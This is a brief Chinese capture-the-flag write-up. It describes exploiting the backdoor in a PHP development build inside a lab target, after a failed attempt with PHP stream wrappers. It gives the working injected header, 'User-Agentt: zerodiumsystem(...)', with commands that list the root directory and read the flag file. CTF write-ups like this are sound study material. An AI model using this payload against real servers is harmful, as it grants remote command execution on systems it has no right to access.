首先进入靶场如下
按照习惯,BP先抓一波包
结合题目说的 题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
于是想到伪协议操作一下
发送给reapter
发现伪协议 嗯 不得行
不过 响应包有个东西引起注意
百度
发现 好家伙 这里有东西
这家伙 有漏洞可以用
在Connection 字段下面加上
User-Agentt:zerodiumsystem("ls /");
注意 zerodium后面拼接函数
发送
好家伙!
有东西
然后
替换成这个User-Agentt:zerodiumsystem("cat /flag");
提交 就完事儿了